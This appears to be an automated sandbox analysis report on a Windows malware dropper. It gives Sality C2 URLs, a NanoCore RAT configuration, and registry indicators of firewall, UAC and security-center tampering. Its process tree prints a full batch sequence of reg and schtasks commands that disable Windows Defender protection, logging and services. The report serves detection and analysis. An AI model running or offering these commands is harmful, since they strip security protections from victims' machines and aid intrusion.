Analysis
-
max time kernel
22s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-10-2024 05:08
Static task
static1
Behavioral task
behavioral1
Sample
2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe
Resource
win7-20240708-en
General
-
Target
2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe
-
Size
17.0MB
-
MD5
2b66ca254c7c9100343699af457f9d81
-
SHA1
36a13e65f57b4ed2f515e752f7ab29b68aa341c7
-
SHA256
1fd3e2f6d6e9166cba0086664635f86ba4b4aaf1277a853cf718f6f24d672d6d
-
SHA512
4ad6155146eecfcc5f2638772444056ed2c7ebd6867711be66cab87c3156820ce1bb179b96762ae2db3bb98fca16c0daab5e5dc9da294cb3963cd2ba3151ec85
-
SSDEEP
393216:UHNOPJo4+k2Br1BMgUD6okK/o4CgMi4GZfT2qZV5:UtOdB2B0gmNkK/Zv4GZPV
Malware Config
Extracted
sality
http://89.119.67.154/testo5/
http://kukutrustnet777.info/home.gif
http://kukutrustnet888.info/home.gif
http://kukutrustnet987.info/home.gif
http://www.klkjwre9fqwieluoi.info/
http://kukutrustnet777888.info/
http://klkjwre77638dfqwieuoi888.info/
Extracted
nanocore
1.2.2.0
hitexe.endofinternet.net:33045
f6e3cbdc-25fe-4e6f-9495-3c5a40bf4ed0
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2020-12-29T23:08:57.329436536Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
33045
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
f6e3cbdc-25fe-4e6f-9495-3c5a40bf4ed0
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
hitexe.endofinternet.net
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Modifies firewall policy service 3 TTPs 6 IoCs
Processes:
MsPlaying.exenb660-full.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" MsPlaying.exe -
Processes:
MsPlaying.exenb660-full.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" nb660-full.exe -
Processes:
nb660-full.exeMsPlaying.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" nb660-full.exe -
Disables RegEdit via registry modification 2 IoCs
Processes:
MsPlaying.exenb660-full.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools = "1" MsPlaying.exe Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools = "1" nb660-full.exe -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe -
Deletes itself 1 IoCs
Processes:
MsPlaying.exepid Process 3368 MsPlaying.exe -
Executes dropped EXE 3 IoCs
Processes:
MsPlaying.exeMsfUpdate.exenb660-full.exepid Process 3368 MsPlaying.exe 4204 MsfUpdate.exe 1720 nb660-full.exe -
Loads dropped DLL 11 IoCs
Processes:
nb660-full.exepid Process 1720 nb660-full.exe 1720 nb660-full.exe 1720 nb660-full.exe 1720 nb660-full.exe 1720 nb660-full.exe 1720 nb660-full.exe 1720 nb660-full.exe 1720 nb660-full.exe 1720 nb660-full.exe 1720 nb660-full.exe 1720 nb660-full.exe -
Processes:
MsPlaying.exenb660-full.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" nb660-full.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" nb660-full.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" nb660-full.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" nb660-full.exe -
Processes:
MsPlaying.exenb660-full.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" nb660-full.exe -
Processes:
resource yara_rule behavioral2/memory/3368-30-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-36-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-39-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-69-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-59-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-51-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-44-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-40-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-34-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-35-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-101-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-102-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-105-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/3368-106-0x00000000021F0000-0x000000000327E000-memory.dmp upx behavioral2/memory/1720-143-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-148-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-147-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-145-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-146-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-142-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-141-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-139-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-144-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-150-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-149-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-151-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-152-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-154-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-155-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-157-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-158-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-160-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-163-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-162-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-164-0x0000000004FB0000-0x000000000603E000-memory.dmp upx behavioral2/memory/1720-167-0x0000000004FB0000-0x000000000603E000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
Processes:
nb660-full.exedescription ioc Process File opened for modification C:\PROGRAM FILES\7-ZIP\7z.exe nb660-full.exe File opened for modification C:\PROGRAM FILES\7-ZIP\7zFM.exe nb660-full.exe -
Drops file in Windows directory 1 IoCs
Processes:
MsPlaying.exedescription ioc Process File opened for modification C:\Windows\SYSTEM.INI MsPlaying.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
MsfUpdate.exeMsPlaying.exenb660-full.exe2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsfUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsPlaying.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nb660-full.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule behavioral2/files/0x0007000000023ca2-24.dat nsis_installer_1 behavioral2/files/0x0007000000023ca2-24.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
nb660-full.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nb660-full.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz nb660-full.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
MsPlaying.exenb660-full.exepid Process 3368 MsPlaying.exe 3368 MsPlaying.exe 1720 nb660-full.exe 1720 nb660-full.exe 1720 nb660-full.exe 1720 nb660-full.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
MsPlaying.exedescription pid Process Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe Token: SeDebugPrivilege 3368 MsPlaying.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
MsPlaying.exepid Process 3368 MsPlaying.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exeMsPlaying.execmd.exedescription pid Process procid_target PID 3224 wrote to memory of 3368 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 86 PID 3224 wrote to memory of 3368 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 86 PID 3224 wrote to memory of 3368 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 86 PID 3224 wrote to memory of 4204 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 89 PID 3224 wrote to memory of 4204 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 89 PID 3224 wrote to memory of 4204 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 89 PID 3224 wrote to memory of 1720 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 90 PID 3224 wrote to memory of 1720 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 90 PID 3224 wrote to memory of 1720 3224 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe 90 PID 3368 wrote to memory of 4932 3368 MsPlaying.exe 91 PID 3368 wrote to memory of 4932 3368 MsPlaying.exe 91 PID 3368 wrote to memory of 792 3368 MsPlaying.exe 8 PID 3368 wrote to memory of 796 3368 MsPlaying.exe 9 PID 3368 wrote to memory of 64 3368 MsPlaying.exe 13 PID 3368 wrote to memory of 2744 3368 MsPlaying.exe 50 PID 3368 wrote to memory of 2780 3368 MsPlaying.exe 51 PID 3368 wrote to memory of 2992 3368 MsPlaying.exe 52 PID 3368 wrote to memory of 3428 3368 MsPlaying.exe 56 PID 3368 wrote to memory of 3568 3368 MsPlaying.exe 57 PID 3368 wrote to memory of 3748 3368 MsPlaying.exe 58 PID 3368 wrote to memory of 3840 3368 MsPlaying.exe 59 PID 3368 wrote to memory of 3904 3368 MsPlaying.exe 60 PID 3368 wrote to memory of 3988 3368 MsPlaying.exe 61 PID 3368 wrote to memory of 4104 3368 MsPlaying.exe 62 PID 3368 wrote to memory of 2412 3368 MsPlaying.exe 74 PID 3368 wrote to memory of 2284 3368 MsPlaying.exe 76 PID 3368 wrote to memory of 4432 3368 MsPlaying.exe 80 PID 3368 wrote to memory of 4896 3368 MsPlaying.exe 81 PID 3368 wrote to memory of 3224 3368 MsPlaying.exe 82 PID 3368 wrote to memory of 1392 3368 MsPlaying.exe 84 PID 3368 wrote to memory of 1404 3368 MsPlaying.exe 85 PID 3368 wrote to memory of 5024 3368 MsPlaying.exe 88 PID 3368 wrote to memory of 4204 3368 MsPlaying.exe 89 PID 3368 wrote to memory of 4204 3368 MsPlaying.exe 89 PID 3368 wrote to memory of 1720 3368 MsPlaying.exe 90 PID 3368 wrote to memory of 1720 3368 MsPlaying.exe 90 PID 3368 wrote to memory of 4932 3368 MsPlaying.exe 91 PID 4932 wrote to memory of 4968 4932 cmd.exe 92 PID 4932 wrote to memory of 4968 4932 cmd.exe 92 PID 4932 wrote to memory of 1428 4932 cmd.exe 93 PID 4932 wrote to memory of 1428 4932 cmd.exe 93 PID 4932 wrote to memory of 1980 4932 cmd.exe 125 PID 4932 wrote to memory of 1980 4932 cmd.exe 125 PID 4932 wrote to memory of 4516 4932 cmd.exe 95 PID 4932 wrote to memory of 4516 4932 cmd.exe 95 PID 4932 wrote to memory of 2000 4932 cmd.exe 96 PID 4932 wrote to memory of 2000 4932 cmd.exe 96 PID 4932 wrote to memory of 2984 4932 cmd.exe 97 PID 4932 wrote to memory of 2984 4932 cmd.exe 97 PID 4932 wrote to memory of 1624 4932 cmd.exe 98 PID 4932 wrote to memory of 1624 4932 cmd.exe 98 PID 4932 wrote to memory of 4448 4932 cmd.exe 99 PID 4932 wrote to memory of 4448 4932 cmd.exe 99 PID 4932 wrote to memory of 1664 4932 cmd.exe 100 PID 4932 wrote to memory of 1664 4932 cmd.exe 100 PID 4932 wrote to memory of 4632 4932 cmd.exe 101 PID 4932 wrote to memory of 4632 4932 cmd.exe 101 PID 4932 wrote to memory of 1144 4932 cmd.exe 102 PID 4932 wrote to memory of 1144 4932 cmd.exe 102 PID 4932 wrote to memory of 1832 4932 cmd.exe 103 PID 4932 wrote to memory of 1832 4932 cmd.exe 103 PID 4932 wrote to memory of 1800 4932 cmd.exe 104 PID 4932 wrote to memory of 1800 4932 cmd.exe 104 PID 4932 wrote to memory of 2276 4932 cmd.exe 105 -
System policy modification 1 TTPs 2 IoCs
Processes:
MsPlaying.exenb660-full.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" MsPlaying.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" nb660-full.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:792
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:796
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:64
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2780
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2992
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3428
-
C:\Users\Admin\AppData\Local\Temp\2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"3⤵
- Modifies firewall policy service
- UAC bypass
- Windows security bypass
- Disables RegEdit via registry modification
- Deletes itself
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3368 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5024
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A46E.tmp\A46F.tmp\A470.bat C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:4968
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵PID:1428
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:1980
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:4516
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵PID:2000
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵PID:2984
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵PID:1624
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:4448
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵PID:1664
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:4632
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:1144
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:1832
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:1800
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:2276
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:1804
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:3148
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:3688
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:4568
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:3664
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:532
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:736
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:1960
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:3628
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:3496
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:2680
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:3936
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:2392
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:708
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:4856
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:4080
-
-
-
-
